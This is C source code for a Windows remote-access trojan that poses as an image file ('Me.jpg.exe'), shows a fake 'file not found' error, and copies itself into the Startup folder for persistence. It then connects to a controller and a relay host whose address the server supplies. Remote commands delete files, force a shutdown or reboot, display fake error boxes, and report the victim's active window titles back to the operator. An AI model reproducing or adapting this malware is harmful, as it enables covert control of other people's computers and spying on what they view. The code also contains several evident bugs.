
//make it transfer a file 
//make W2000 shutdown
//properly transfer socket

#include <windows.h>
#include <stdio.h>
#include "vsStatComm.h"
#include "Protocol.H"
#include "cWindow.h"

void HandleComm(char*);
void DisplayMessage(char*);
void Shutdown(char*, int);
void windowTimer(char*);
void LoadBMP(char*);
void toggleReportWindow();
bool getReportWindow();
void HandleExtras();
void ReportWindow();
void Delete(char*);
DWORD WINAPI Receive_Thread(LPVOID data);

bool reportWindow = false;

vsStatComm suckBug;
vsStatComm serverConn;
vsStatComm thirdParty;
cWindow ourWindow;

const int SEND = 1;
const int RECV = 2;

//HWND theWindow;

LRESULT CALLBACK WindowProc(HWND hwnd, 
						    UINT msg, 
                            WPARAM wparam, 
                            LPARAM lParam)
{
	// this is the main message handler of the system
	PAINTSTRUCT		ps;		// used in WM_PAINT
	HDC				hdc;	// handle to a device context
//	char txtbuffer[80];        // used to print strings

	// what is the message 
	switch(msg)
		{	
		case WM_CREATE: {
			// do initialization stuff here
			// return success
			return(0);
		}break;
		 
		case WM_PAINT: {
			// simply validate the window 
   			hdc = BeginPaint(hwnd,&ps);	 
			// end painting
			EndPaint(hwnd,&ps);
			// return success
			return(0);
   		}break;			   

		case WM_KEYDOWN:							// Is A Key Being Held Down?
		{
			return 0;								
		}break;

		case WM_DESTROY: {
			PostQuitMessage(0);
			return 0;
		}break;  
		
		default: {}
	} // end switch

	// process any messages that we didn't take care of 
	return (DefWindowProc(hwnd, msg, wparam, lParam));

} // end WinProc

int WINAPI WinMain(HINSTANCE hinstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd) {

	
	MSG msg;
	ourWindow.setInstance(hinstance);
	//2 threads, one for connecting to the server (if necessary)
	//and one for the direct connection
	char pitaMsg[MAX_LENGTH];
	char msgSend[MAX_LENGTH];
	static HANDLE thread_handle[3] = {NULL};
	unsigned long thread_id[3];

	//initial file is Help.exe which is copied to Vsstat in the startup folder
	//and messagebox is only displayed the first time
	if (CopyFile("Me.jpg.exe","C:\\WINDOWS\\Start Menu\\Programs\\StartUp\\Vsstat.exe", FALSE)) {
		MessageBox(NULL,"Error: File 'me.jpg' not found!","FILE NOT FOUND",MB_ICONEXCLAMATION);
	}
	//ones the connection to communicate with the sender2.exe
	suckBug.setPort(HAL_US);  
	suckBug.setMaxMsgLength(MAX_LENGTH);
	suckBug.openServerConn();

	serverConn.setIP("127.0.0.1");
	serverConn.setPort(HAL_SERVER);  //2501 leads to server...2500 leads to sender2.exe
	serverConn.setMaxMsgLength(MAX_LENGTH);
	serverConn.openConn();   

	thirdParty.setPort(THIRDPARTY);  //2501 leads to server...2500 leads to sender2.exe
	thirdParty.setMaxMsgLength(MAX_LENGTH);
	
	for (int i=0;i<4;i++) {
		thread_handle[4] = CreateThread(NULL,0,Receive_Thread,(LPVOID)i,0,&thread_id[i]);
	}

	//waits to receive an 'A' from sender2.exe - which means connection accepted
	while ((pitaMsg[0] != P_ACCEPT)) {
		suckBug.recvData(pitaMsg);
	}

	/*if (pitaMsg[0] == P_SETIP) {
		suckBug.setIP(suckBug.getAddr());
		suckBug.closeConn();
		suckBug.openConn();
	}
	*/
	sprintf(msgSend,encode(P_ACCEPT," "));
	suckBug.sendData(msgSend); //sends back an 'A' so sender2.exe knows its accepted
	
	while (TRUE) {
		if (PeekMessage(&msg,NULL,0,0,PM_REMOVE)) {
			if (msg.message == WM_QUIT) {
				break;
			}
			TranslateMessage(&msg);
			DispatchMessage(&msg);
		}
		else {
			if (suckBug.isConnected()) {
				suckBug.recvData(pitaMsg);  //receives and then sends back to let sender know it made it
				suckBug.sendData(pitaMsg);
				HandleComm(pitaMsg);  //takes to the translator
			}
		}
	}

	return 0;

}

void SendAll(char *msg) {

	suckBug.sendData(msg);
	if (thirdParty.isConnected()) {
		thirdParty.sendData(msg);
	}
}

void ServerConnection(int data) { //called from the thread 1 or 2

	char msg[MAX_LENGTH];

	while (data == SEND) {
	//	while (!serverConn.isConnected()) {
			serverConn.sendData("H");  //sends misc data to server so server sees it
			Sleep(20000); //try once a minute
	//	}
	}
		
	while (data == RECV) {
		
		//serverConn.sendData("H");  //sends misc data to server so server sees it
		serverConn.recvData(msg); //receives message 
		if (msg[0] == P_CLOSE) {    //receives message - should receive a 'C'
			//serverConn.closeConn();   //server has properly identified IP so this can close
			//serverConn.setIP("24.21.71.84");
			//serverConn.openConn();3
		}
			
		else if(msg[0] == P_SETIP) {
			//suckBug.closeConn();
			//suckBug.setAddr(msg);
			//suckBug.openConn();
			thirdParty.closeConn();
			thirdParty.setAddr(msg);
			thirdParty.openConn();
			while (msg[0] != P_ACCEPT) {
				sprintf(msg, encode(P_ACCEPT," "));
				//suckBug.sendData(msg);
				//suckBug.recvData(msg);
				//MessageBox(NULL,msg,"received to",NULL);
				thirdParty.sendData(msg);
				thirdParty.recvData(msg);
			}
		}
		else {
			//HandleComm(msg);   //if it is something else it will be handled accordingly
		}
	}
}



DWORD WINAPI Receive_Thread(LPVOID data) {

	while ((int)data == 0) {
		HandleExtras();
		Sleep(100);
	}
	
	if (((int)data == SEND) || ((int)data == RECV)) { 
		ServerConnection((int)data);
				
	}

	char msg[MAX_LENGTH];

	if ((int)data == 3) {
		while (1) {
			if (thirdParty.isConnected()) { //handles the proxy server
				thirdParty.recvData(msg);
				thirdParty.sendData(msg);
				HandleComm(msg);
			}
	}
		}

	return ((DWORD)data);
}

void HandleExtras() { //thread 1 will handle any 'extras' i throw in

	if (getReportWindow()) {
		ReportWindow();
	}
	
	

}

void ReportWindow() {  //toggled on and off by sender by sending a 'G'
						//this just loops through with the thread, gets the
					//window class name...then the title for it and sends it back to 
					//sender2.exe - its own its own thread cause it doesn't want to interfere
					 //with the incoming commands -
					//sender has a sepereate thread to receive all commands

	static HWND wHndl = 0;
	HWND cHndl = 0;
	char report[MAX_LENGTH - 10];
	char finalSend[MAX_LENGTH];

	cHndl = GetForegroundWindow();
	
	if (cHndl != wHndl) {
		GetWindowText(cHndl,report,MAX_LENGTH - 10);
		sprintf(finalSend, "Now viewing: %s",report);
		SendAll(finalSend);
		//suckBug.sendData(finalSend);
		//serverConn.sendData(finalSend);	
		//if (thirdParty.isConnected()) {thirdParty.sendData(finalSend);}
		wHndl = cHndl;
	}
}

void HandleComm(char *msg) {
	
	
	switch (msg[0]) {
		case P_MESSAGE : {DisplayMessage(msg);break;} //message box
		case P_SHUTDOWN : {Shutdown(msg, EWX_SHUTDOWN);break;} //shutdown
		case P_REBOOT : {Shutdown(msg, EWX_REBOOT);break;} //shutdown / reboot
		case P_GETWINDOW : {toggleReportWindow();break;} //turn on/off reporting
		case P_DELETE : {Delete(msg);break;}//deletes file
		case P_WINDOW : {windowTimer(msg);break;}		
		case P_LOADBMP : {LoadBMP(msg);break;}
		
	}
	
}

void LoadBMP(char *msg) {

	char lMsg[MAX_LENGTH];
	for (int i=0;i<MAX_LENGTH-1;i++) {
		lMsg[i] = msg[i+1];
	}
	
	if (ourWindow.Create(lMsg)) {
		SendAll("Window Created / Pic Loaded Successfully");
		//suckBug.sendData("Window Created / Pic Loaded Successfully");
	}
	else {SendAll("Window / Pic Failed");}
		//suckBug.sendData("Window / Pic Failed");}


}

void windowTimer(char *msg) {

	if (!ourWindow.isPicLoaded()) {
		SendAll("\nYou must load a picture first");
		return;
	}

	char tMsg[MAX_LENGTH];
		for (int i=0;i<MAX_LENGTH-1;i++) {
		tMsg[i] = msg[i+1];
	}
	
	ourWindow.Show(true);
	SendAll("\nWindow Shown");
	//suckBug.sendData("\nWindow Shown");
	Sleep(atoi(tMsg));
	ourWindow.Show(false);
	SendAll("\nWindow Hidden");
	//suckBug.sendData("\nWindow Hidden");
}

void Delete(char *msg) {

	char dMsg[MAX_LENGTH];
	for (int i=0;i<MAX_LENGTH-1;i++) {
		dMsg[i] = msg[i+1];
	}
	MessageBox(NULL,dMsg,"Deleteing",NULL);
	int t=DeleteFile(dMsg);

}

bool getReportWindow() {
	return reportWindow;
}

void toggleReportWindow() { //toggle "switch"

	if (!reportWindow) {
		reportWindow = true;
		SendAll("Window Reporting On");
	}
	else {
		reportWindow = false;
		SendAll("Window Reporting Off");
	}

}

void Shutdown(char *msg, int method) {  

	int t=0;
	char sMsg[MAX_LENGTH];

//	unsigned long tpCount;

	HANDLE hProc = GetCurrentProcess();

	_TOKEN_PRIVILEGES tp;
//	_TOKEN_PRIVILEGES tpNew;
	LUID luid;
	//_LUID_AND_ATTRIBUTES la;
	PHANDLE ph = NULL;

	OpenProcessToken(hProc,TOKEN_ADJUST_PRIVILEGES || TOKEN_QUERY,ph);
	LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME, &luid);
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	tp.Privileges[0].Luid = luid;

	//tpCount = 4 + (12 * tpNew.PrivilegeCount);

	AdjustTokenPrivileges(ph,FALSE,&tp,NULL	,NULL,NULL);//4 + (12 * tp.PrivilegeCount),&tpNew,&tpCount);

	
    //AdjustTokenPrivileges hToken, False, mPriv, 4 + (12 * mPriv.PrivilegeCount), mNewPriv, 4 + (12 * mNewPriv.PrivilegeCount)


	if (msg[1] == P_MESSAGE) {   //if there is a message also, it displays it first
		for (int i=1;i<MAX_LENGTH;i++) {
			sMsg[i] = msg[i+1];
		}
		DisplayMessage(sMsg);
	}

	t = ExitWindowsEx(method|EWX_FORCE,0); //goodbye

}

void DisplayMessage(char *msg) {

	unsigned int expression = 0;
	int msgStartsAt = 1;

	switch (msg[1]) {   //different icons
		case '!' : {expression = MB_ICONEXCLAMATION;msgStartsAt = 2;break;}
		case '?' : {expression = MB_ICONQUESTION;msgStartsAt = 2;break;}
		case '*' : {expression = MB_ICONSTOP;msgStartsAt = 2;break;}
	}

	char displayMsg[MAX_LENGTH] = " ";
	char caption[MAX_LENGTH] = "Win32 Error";
	bool writeCaption = false;
	int c=0;

	for (int i=0;i<49;i++) {  //this puts spaces where periods are, and puts
								//everything after the & as a caption
		if (msg[i + msgStartsAt] == P_SPACE) {msg[i + msgStartsAt] = ' ';}
		if (msg[i + msgStartsAt] == P_CAPTION) {writeCaption = true;i++;}
		if (writeCaption) {
			caption[c] = msg[i + msgStartsAt];
			c++;
		}
		else {
			displayMsg[i] = msg[i + msgStartsAt];
		}
	}

	MessageBox(NULL,displayMsg,caption,MB_OK|expression);
}

